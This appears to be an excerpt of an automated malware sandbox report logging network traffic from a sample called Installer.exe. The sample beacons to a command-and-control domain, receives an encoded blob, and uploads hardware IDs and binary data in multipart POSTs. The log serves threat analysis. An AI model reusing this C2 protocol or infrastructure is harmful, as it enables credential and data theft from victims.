Jan 5, 2025 19:40:58.611097097 CET	1.1.1.1	192.168.2.4	0x6f9a	No error (0)	fancywaxxers.shop	104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:40:58.611097097 CET	1.1.1.1	192.168.2.4	0x6f9a	No error (0)	fancywaxxers.shop	104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:40:58.611097097 CET	1.1.1.1	192.168.2.4	0x6f9a	No error (0)	fancywaxxers.shop	104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 5, 2025 19:40:58.611097097 CET	1.1.1.1	192.168.2.4	0x6f9a	No error (0)	fancywaxxers.shop	104.21.16.1	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

fancywaxxers.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	104.21.32.1	443	7480	C:\Users\user\Desktop\Installer.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:40:59 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fancywaxxers.shop
2025-01-05 18:40:59 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-05 18:40:59 UTC	1132	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:40:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ol3g7t5o5jvl6laibbcod8hacj; expires=Thu, 01 May 2025 12:27:38 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h0BltsEtZx9xPh8D%2Fut0aYnxFOTRahWwJvbJ0Qqk0LcdObaLPsA2AfhM08NcEOSauxshAwO7W%2FE0zQcxjmCi84p0s0fqP4NpViOGG36MowCW%2BRuu9B58%2FIPuq4%2FsHfapSYA9yw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd599931c8e4344-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1652&min_rtt=1632&rtt_var=652&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2842&recv_bytes=908&delivery_rate=1627647&cwnd=47&unsent_bytes=0&cid=cc88d5e59bf06449&ts=650&x=0"
2025-01-05 18:40:59 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-05 18:40:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49732	104.21.32.1	443	7480	C:\Users\user\Desktop\Installer.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:41:00 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 52 Host: fancywaxxers.shop
2025-01-05 18:41:00 UTC	52	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 31 36 36 36 32 34 32 38 31 38 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--1666242818&j=
2025-01-05 18:41:00 UTC	1129	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:41:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ink92qgre3qg2bbke6c8vvq8c9; expires=Thu, 01 May 2025 12:27:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DQ8lHNi%2BcirR6LeCfbs7jHuEf6B5nF3P3hLNlqw0KMklk2%2Bwz%2BvKO75th7OKU86RmDGuGQTwJFquXM7wJan5KEQa4Il85zXcIYwX9l5buTvjjNozCt74i2GNM86AYUBY7hOsMA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd59998f95872b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1806&min_rtt=1802&rtt_var=684&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=953&delivery_rate=1591280&cwnd=214&unsent_bytes=0&cid=9e29b21fe641fa7a&ts=522&x=0"
2025-01-05 18:41:00 UTC	240	IN	Data Raw: 34 36 38 0d 0a 2b 6c 2b 4c 67 4e 62 59 4d 56 68 67 50 2f 6f 2f 32 48 66 64 66 5a 6e 35 6a 30 54 72 47 68 38 2b 77 41 74 37 76 32 76 35 37 4e 36 42 66 66 32 69 37 4f 77 64 65 68 4e 61 32 41 57 73 42 61 67 59 74 64 76 75 49 4d 6b 67 65 56 2b 73 65 42 36 54 53 59 2b 42 2f 4d 41 35 36 75 79 6c 76 52 31 36 42 55 66 59 42 59 4d 4d 2f 78 6a 33 32 37 56 6d 6a 6e 42 39 58 36 78 70 47 74 51 45 69 59 43 39 6b 6a 50 73 36 4c 4f 37 56 54 6b 4d 55 70 39 61 76 52 61 33 45 2f 43 55 35 79 6e 4a 4e 6a 31 62 75 69 6c 42 6e 53 61 63 6d 4c 2b 33 50 76 6a 72 39 4b 55 64 49 30 4a 61 6c 42 33 69 56 62 77 59 2b 35 58 70 49 49 42 79 64 31 61 6b 61 42 2f 56 47 35 43 4b 74 70 49 39 37 2b 6d 35 73 6b 45 30 42 6c 57 55 58 4c 63 57 2f 31 47 Data Ascii: 468+l+LgNbYMVhgP/o/2HfdfZn5j0TrGh8+wAt7v2v57N6Bff2i7OwdehNa2AWsBagYtdvuIMkgeV+seB6TSY+B/MA56uylvR16BUfYBYMM/xj327VmjnB9X6xpGtQEiYC9kjPs6LO7VTkMUp9avRa3E/CU5ynJNj1builBnSacmL+3Pvjr9KUdI0JalB3iVbwY+5XpIIByd1akaB/VG5CKtpI97+m5skE0BlWUXLcW/1G
2025-01-05 18:41:00 UTC	895	IN	Data Raw: 37 6e 50 56 6d 30 54 67 75 62 71 46 34 43 4d 67 45 69 34 6a 38 68 33 50 77 6f 72 4f 32 45 32 4a 43 56 5a 52 54 76 78 61 77 47 50 71 62 2f 79 6d 4a 65 33 56 55 70 6d 4d 57 30 67 61 56 68 4c 75 51 4e 4f 37 74 73 37 4a 56 4e 51 45 64 31 68 32 39 44 66 39 48 75 37 76 39 4a 59 70 73 63 45 33 69 64 6c 66 45 53 5a 79 43 2f 4d 42 39 37 2b 79 31 74 31 4d 6f 43 6c 61 54 57 4b 67 65 74 68 4c 32 6d 2b 41 73 68 6e 74 39 57 36 68 6a 46 74 63 4e 6c 6f 4f 36 6d 44 32 70 72 50 53 39 53 33 70 61 48 62 74 59 71 68 4b 7a 43 62 6d 68 72 54 6e 48 59 54 31 62 72 69 6c 42 6e 51 47 65 6a 62 2b 54 4d 75 72 71 76 36 68 54 4b 41 52 51 6e 55 2b 38 45 4c 45 56 2b 49 6e 6e 4b 49 39 37 64 46 65 72 62 42 37 5a 53 64 58 4f 75 34 42 39 73 61 4b 56 74 31 67 32 43 45 71 59 48 61 56 62 70 6c Data Ascii: 7nPVm0TgubqF4CMgEi4j8h3PworO2E2JCVZRTvxawGPqb/ymJe3VUpmMW0gaVhLuQNO7ts7JVNQEd1h29Df9Hu7v9JYpscE3idlfESZyC/MB97+y1t1MoClaTWKgethL2m+Ashnt9W6hjFtcNloO6mD2prPS9S3paHbtYqhKzCbmhrTnHYT1brilBnQGejb+TMurqv6hTKARQnU+8ELEV+InnKI97dFerbB7ZSdXOu4B9saKVt1g2CEqYHaVbpl
2025-01-05 18:41:00 UTC	1369	IN	Data Raw: 34 35 32 63 0d 0a 69 68 7a 31 6c 65 6f 77 79 57 63 7a 52 65 4a 75 46 5a 31 52 32 34 47 7a 6c 7a 58 70 34 37 43 33 56 7a 73 50 55 5a 46 65 74 68 6d 33 45 76 65 66 34 69 36 42 65 33 56 4f 72 47 63 66 32 77 6d 65 7a 76 4c 59 4f 76 47 69 37 50 70 33 4e 42 56 4a 6b 78 2b 50 46 72 45 52 2f 49 32 74 4f 63 64 68 50 56 75 75 4b 55 47 64 42 35 61 46 73 4a 38 30 36 4f 47 30 73 46 30 31 43 46 57 51 58 62 63 55 74 42 66 39 6c 75 59 70 68 6e 39 31 58 36 35 73 46 4e 35 4a 31 63 36 37 67 48 32 78 6f 70 47 30 55 43 73 54 48 36 31 65 74 42 75 34 43 62 75 45 6f 7a 2f 4a 66 33 45 63 2b 69 6b 54 32 67 36 66 67 37 61 62 4f 65 33 76 75 37 4e 61 4d 78 42 58 6c 46 4f 6f 47 4c 55 61 39 5a 66 6f 4b 59 6c 35 66 46 4b 6f 59 6c 6d 54 53 5a 79 57 2f 4d 42 39 78 75 2b 6b 71 46 6b 78 45 Data Ascii: 452cihz1leowyWczReJuFZ1R24GzlzXp47C3VzsPUZFethm3Evef4i6Be3VOrGcf2wmezvLYOvGi7Pp3NBVJkx+PFrER/I2tOcdhPVuuKUGdB5aFsJ806OG0sF01CFWQXbcUtBf9luYphn91X65sFN5J1c67gH2xopG0UCsTH61etBu4CbuEoz/Jf3Ec+ikT2g6fg7abOe3vu7NaMxBXlFOoGLUa9ZfoKYl5fFKoYlmTSZyW/MB9xu+kqFkxE
2025-01-05 18:41:00 UTC	1369	IN	Data Raw: 39 44 66 39 48 75 37 54 75 4d 49 4d 34 59 68 4b 37 4b 52 37 52 53 63 50 4f 74 70 51 35 36 75 36 39 74 6c 34 37 42 6c 71 56 57 62 6f 54 75 52 72 36 6b 4f 55 71 68 6e 4a 78 57 4b 35 67 48 39 45 4b 6d 49 6a 38 31 6e 33 75 2b 76 54 69 45 78 73 50 56 70 52 64 75 51 53 34 58 37 58 62 34 79 43 4a 4f 43 56 4b 73 6e 34 65 77 6b 65 43 7a 72 75 55 66 62 47 69 76 71 68 57 4e 41 5a 58 6e 56 6d 32 48 37 38 61 36 5a 50 72 49 59 56 77 65 46 4f 6b 62 42 54 61 41 70 69 63 72 70 73 35 35 2b 37 30 39 42 4d 39 47 68 33 41 48 5a 38 43 76 41 2f 39 6d 4b 30 35 78 32 45 39 57 36 34 70 51 5a 30 4a 6c 59 4b 33 6e 7a 62 69 35 72 43 36 58 6a 45 4d 55 35 46 52 73 68 6d 34 44 66 61 65 35 53 79 41 66 58 46 52 6f 58 73 61 33 45 6e 56 7a 72 75 41 66 62 47 69 6b 34 6c 6b 47 55 4a 43 31 6b Data Ascii: 9Df9Hu7TuMIM4YhK7KR7RScPOtpQ56u69tl47BlqVWboTuRr6kOUqhnJxWK5gH9EKmIj81n3u+vTiExsPVpRduQS4X7Xb4yCJOCVKsn4ewkeCzruUfbGivqhWNAZXnVm2H78a6ZPrIYVweFOkbBTaApicrps55+709BM9Gh3AHZ8CvA/9mK05x2E9W64pQZ0JlYK3nzbi5rC6XjEMU5FRshm4Dfae5SyAfXFRoXsa3EnVzruAfbGik4lkGUJC1k
2025-01-05 18:41:00 UTC	1369	IN	Data Raw: 58 36 50 62 77 53 57 47 63 7a 31 44 37 48 42 5a 32 67 58 62 31 76 79 66 4e 65 48 73 74 37 78 59 4e 67 35 63 6b 56 75 2f 48 62 67 51 2f 4a 4c 71 4a 6f 39 71 65 6c 47 72 61 52 4c 55 41 35 2b 50 74 39 68 7a 71 65 57 73 2b 67 74 36 4d 46 71 4f 54 62 6c 56 6f 46 48 69 32 2b 6f 71 79 53 41 39 55 62 42 6f 48 4d 38 4e 6c 49 57 75 6b 7a 76 70 35 36 61 39 58 7a 41 4e 58 70 42 51 75 52 32 74 48 2f 61 62 2f 7a 53 50 63 33 4d 63 37 43 6b 65 78 55 6e 44 7a 6f 32 50 4e 71 6e 39 2b 71 4d 54 50 51 34 64 77 42 32 35 48 37 49 52 36 5a 2f 72 4c 59 70 32 64 56 6d 71 62 52 50 51 42 70 43 45 74 5a 41 39 35 75 65 38 73 56 55 30 41 31 75 55 55 50 70 62 2f 78 6a 6a 32 37 56 6d 72 6d 4a 77 57 72 56 34 4c 4e 6f 4a 79 73 36 6a 31 69 53 70 35 62 6a 36 43 33 6f 50 55 5a 4a 51 76 78 47 Data Ascii: X6PbwSWGcz1D7HBZ2gXb1vyfNeHst7xYNg5ckVu/HbgQ/JLqJo9qelGraRLUA5+Pt9hzqeWs+gt6MFqOTblVoFHi2+oqySA9UbBoHM8NlIWukzvp56a9XzANXpBQuR2tH/ab/zSPc3Mc7CkexUnDzo2PNqn9+qMTPQ4dwB25H7IR6Z/rLYp2dVmqbRPQBpCEtZA95ue8sVU0A1uUUPpb/xjj27VmrmJwWrV4LNoJys6j1iSp5bj6C3oPUZJQvxG
2025-01-05 18:41:00 UTC	1369	IN	Data Raw: 4b 4d 2f 79 58 39 78 48 50 6f 70 46 39 41 50 6d 6f 2b 30 6b 44 33 76 36 4c 43 35 57 6a 6b 46 56 4a 35 57 75 52 2b 77 47 50 32 66 37 53 32 4f 64 6e 74 5a 71 57 42 5a 6b 30 6d 63 6c 76 7a 41 66 63 2f 42 70 71 68 68 4e 41 46 47 32 45 4c 30 44 50 38 59 39 39 75 31 5a 6f 4a 77 63 6b 36 6e 59 42 48 5a 41 4a 75 4b 74 70 55 36 36 65 65 35 76 31 63 30 42 6c 71 59 55 62 55 53 74 78 44 2f 6d 2b 4a 6d 78 7a 68 36 52 4f 49 78 57 66 30 43 6a 61 2b 79 6b 79 2b 70 2f 66 71 6a 45 7a 30 4f 48 63 41 64 74 42 79 2b 46 2f 57 58 35 53 4b 62 65 48 5a 56 72 57 67 57 33 51 71 61 68 4c 53 4b 4f 2b 6e 70 76 4c 31 62 50 67 78 50 6d 56 4c 36 57 2f 38 59 34 39 75 31 5a 72 68 75 65 6c 75 74 4b 7a 44 61 45 70 71 45 76 35 4d 78 71 66 33 36 6f 78 4d 39 44 68 33 41 48 62 63 5a 73 68 76 70 Data Ascii: KM/yX9xHPopF9APmo+0kD3v6LC5WjkFVJ5WuR+wGP2f7S2OdntZqWBZk0mclvzAfc/BpqhhNAFG2EL0DP8Y99u1ZoJwck6nYBHZAJuKtpU66ee5v1c0BlqYUbUStxD/m+Jmxzh6ROIxWf0Cja+yky+p/fqjEz0OHcAdtBy+F/WX5SKbeHZVrWgW3QqahLSKO+npvL1bPgxPmVL6W/8Y49u1ZrhuelutKzDaEpqEv5Mxqf36oxM9Dh3AHbcZshvp
2025-01-05 18:41:00 UTC	1369	IN	Data Raw: 55 34 4a 52 79 70 5a 78 7a 63 42 5a 47 4a 73 6f 6f 38 34 2b 36 31 76 56 51 78 45 46 61 4b 56 72 49 57 73 52 66 79 6d 2b 4d 6d 69 48 56 39 48 4f 77 70 48 73 56 4a 77 38 36 5a 75 79 72 2f 36 50 61 5a 52 43 77 49 57 70 52 4c 73 52 53 38 43 66 61 4c 72 57 6a 4a 61 58 70 4e 34 6a 45 50 7a 52 36 63 6b 66 4b 42 66 65 37 75 39 4f 49 54 4d 51 31 54 6c 56 61 2b 48 4c 6f 58 2b 4a 37 6f 4c 49 56 30 66 46 53 72 59 78 7a 59 44 35 47 4e 73 70 63 38 35 65 61 39 74 46 70 36 54 42 32 66 52 66 70 4e 2f 79 6e 72 6e 50 55 72 6d 54 70 50 58 37 4e 34 44 4e 41 5a 6e 63 79 54 6d 7a 48 71 35 37 4f 71 45 79 56 4d 52 4e 68 61 74 6c 58 6e 58 2f 75 66 34 53 57 4f 64 6e 4a 52 72 57 34 53 30 67 4f 56 6e 4c 4f 64 4e 65 58 71 75 61 68 5a 4d 42 42 55 6b 56 43 30 48 61 30 63 75 39 57 74 49 Data Ascii: U4JRypZxzcBZGJsoo84+61vVQxEFaKVrIWsRfym+MmiHV9HOwpHsVJw86Zuyr/6PaZRCwIWpRLsRS8CfaLrWjJaXpN4jEPzR6ckfKBfe7u9OITMQ1TlVa+HLoX+J7oLIV0fFSrYxzYD5GNspc85ea9tFp6TB2fRfpN/ynrnPUrmTpPX7N4DNAZncyTmzHq57OqEyVMRNhatlXnX/uf4SWOdnJRrW4S0gOVnLOdNeXquahZMBBUkVC0Ha0cu9WtI
2025-01-05 18:41:00 UTC	1369	IN	Data Raw: 45 6d 79 6c 52 6e 54 62 56 7a 71 54 59 5a 61 6e 58 74 37 52 64 50 52 52 4d 31 58 79 33 48 72 4d 53 39 4a 43 74 61 4d 6c 2b 50 51 54 79 4a 31 6e 5a 47 4e 76 57 37 4d 70 6d 76 4c 48 6a 36 67 45 6c 54 45 54 59 53 2f 70 4e 37 56 47 37 69 61 31 2b 79 54 39 2b 54 72 42 76 47 73 73 4b 33 4c 43 43 75 79 72 2f 36 4b 2f 34 64 54 30 54 56 49 35 51 71 43 75 42 4d 66 61 61 37 69 6a 4c 53 57 74 52 73 6d 6f 63 32 6a 65 6c 67 4c 75 4d 4f 75 66 6b 74 50 6f 64 65 67 30 64 77 47 54 36 58 66 38 67 74 64 76 31 5a 74 45 34 53 46 2b 73 5a 78 37 4c 47 4e 61 74 71 34 34 33 38 71 43 53 76 55 49 7a 46 46 43 4b 48 66 52 56 75 56 2b 6a 79 36 4e 6d 6a 57 6b 39 42 50 49 37 51 6f 68 61 7a 4e 37 75 68 33 50 77 6f 71 4c 36 43 32 68 4d 48 59 6f 64 34 6c 58 34 48 4f 6d 4a 36 79 57 66 65 7a Data Ascii: EmylRnTbVzqTYZanXt7RdPRRM1Xy3HrMS9JCtaMl+PQTyJ1nZGNvW7MpmvLHj6gElTETYS/pN7VG7ia1+yT9+TrBvGssK3LCCuyr/6K/4dT0TVI5QqCuBMfaa7ijLSWtRsmoc2jelgLuMOufktPodeg0dwGT6Xf8gtdv1ZtE4SF+sZx7LGNatq4438qCSvUIzFFCKHfRVuV+jy6NmjWk9BPI7QohazN7uh3PwoqL6C2hMHYod4lX4HOmJ6yWfez
2025-01-05 18:41:00 UTC	1369	IN	Data Raw: 48 63 78 4a 77 39 37 75 77 32 69 36 74 65 54 6f 54 48 51 62 48 59 34 64 34 6b 66 78 58 2b 6e 62 74 57 62 4f 65 32 39 4f 70 47 6f 50 33 6b 36 6c 73 49 6d 62 4d 2b 66 6c 6f 6f 39 51 4b 77 46 64 6b 32 4f 45 4e 4c 45 55 2f 4a 66 37 47 4c 64 4e 66 6c 4b 73 62 67 2f 4d 53 64 58 4f 73 39 68 6c 30 4b 4c 38 2b 6d 78 30 51 6b 58 59 42 66 6f 67 76 42 48 31 6e 50 73 33 78 45 31 2b 54 61 46 70 45 70 31 48 32 34 6a 38 77 47 2b 6e 6f 72 43 72 45 32 4a 53 44 38 4d 49 36 55 4c 76 54 65 54 56 39 47 61 66 4f 43 55 4f 37 43 6b 4c 6e 56 48 62 79 62 2b 4b 4c 2b 2f 68 6f 72 6b 55 42 44 78 37 6d 31 71 38 46 72 45 49 36 74 6e 43 4a 59 4a 30 63 56 75 30 56 79 66 49 43 70 57 41 75 34 34 73 71 61 7a 30 74 52 4e 69 4f 78 32 4a 56 37 31 5a 39 31 50 71 69 4f 4d 74 6e 33 38 39 59 2b 77 Data Ascii: HcxJw97uw2i6teToTHQbHY4d4kfxX+nbtWbOe29OpGoP3k6lsImbM+floo9QKwFdk2OENLEU/Jf7GLdNflKsbg/MSdXOs9hl0KL8+mx0QkXYBfogvBH1nPs3xE1+TaFpEp1H24j8wG+norCrE2JSD8MI6ULvTeTV9GafOCUO7CkLnVHbyb+KL+/horkUBDx7m1q8FrEI6tnCJYJ0cVu0VyfICpWAu44sqaz0tRNiOx2JV71Z91PqiOMtn389Y+w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49734	104.21.32.1	443	7480	C:\Users\user\Desktop\Installer.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:41:01 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=PUDNFQAYMVHRR User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18138 Host: fancywaxxers.shop
2025-01-05 18:41:01 UTC	15331	OUT	Data Raw: 2d 2d 50 55 44 4e 46 51 41 59 4d 56 48 52 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 45 34 42 35 30 43 46 31 32 37 43 45 31 39 32 39 30 37 32 44 39 33 37 36 36 42 39 37 43 31 0d 0a 2d 2d 50 55 44 4e 46 51 41 59 4d 56 48 52 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 50 55 44 4e 46 51 41 59 4d 56 48 52 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 31 36 36 36 32 34 32 38 31 38 0d 0a 2d 2d 50 55 44 4e 46 51 Data Ascii: --PUDNFQAYMVHRRContent-Disposition: form-data; name="hwid"68E4B50CF127CE1929072D93766B97C1--PUDNFQAYMVHRRContent-Disposition: form-data; name="pid"2--PUDNFQAYMVHRRContent-Disposition: form-data; name="lid"yau6Na--1666242818--PUDNFQ
2025-01-05 18:41:01 UTC	2807	OUT	Data Raw: e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 Data Ascii: (u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECa
2025-01-05 18:41:02 UTC	1143	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:41:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=agklklqjt456hl1e62hoppolc9; expires=Thu, 01 May 2025 12:27:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EHEiHDIKAOGh%2BuOPGnCpbrnWW5c%2B%2F%2BbDF7w4nN%2Bs6uQ0%2BKa9f1TFE1PybU2%2BxeIaAQzCrvzWkStI4hA%2F3twHn2tJegZUoc1UZ07mC62YkhrPnJ0cH2pZJ1zJX9vXRHV98iN7cw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd599a1bd8172b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1757&min_rtt=1746&rtt_var=677&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2842&recv_bytes=19096&delivery_rate=1589548&cwnd=214&unsent_bytes=0&cid=33adb5ba010b1f2f&ts=736&x=0"
2025-01-05 18:41:02 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 18:41:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49738	104.21.32.1	443	7480	C:\Users\user\Desktop\Installer.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-05 18:41:02 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=D3RME3DCUFW4AHM48 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8783 Host: fancywaxxers.shop
2025-01-05 18:41:02 UTC	8783	OUT	Data Raw: 2d 2d 44 33 52 4d 45 33 44 43 55 46 57 34 41 48 4d 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 38 45 34 42 35 30 43 46 31 32 37 43 45 31 39 32 39 30 37 32 44 39 33 37 36 36 42 39 37 43 31 0d 0a 2d 2d 44 33 52 4d 45 33 44 43 55 46 57 34 41 48 4d 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 44 33 52 4d 45 33 44 43 55 46 57 34 41 48 4d 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 31 36 36 36 32 34 32 38 Data Ascii: --D3RME3DCUFW4AHM48Content-Disposition: form-data; name="hwid"68E4B50CF127CE1929072D93766B97C1--D3RME3DCUFW4AHM48Content-Disposition: form-data; name="pid"2--D3RME3DCUFW4AHM48Content-Disposition: form-data; name="lid"yau6Na--16662428
2025-01-05 18:41:03 UTC	1129	IN	HTTP/1.1 200 OK Date: Sun, 05 Jan 2025 18:41:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lhskokeg7par7mvb8gv55c6s9v; expires=Thu, 01 May 2025 12:27:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UCqSsi64ldyTKaL1bS%2FKuck8zXvxiq6lyMDt371FvRvY3kb8WeDLOVqfq0RjlKO14%2FEXWHNRV5zrDHbniE2JvkZHUm45MJYkN8gd936WqhNvUHobBbSs8hwNPrNGFiX9o1dAOg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fd599a8888bc327-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1628&min_rtt=1596&rtt_var=621&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2843&recv_bytes=9722&delivery_rate=1829573&cwnd=189&unsent_bytes=0&cid=cc41dd7ca87a0514&ts=483&x=0"
2025-01-05 18:41:03 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-05 18:41:03 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

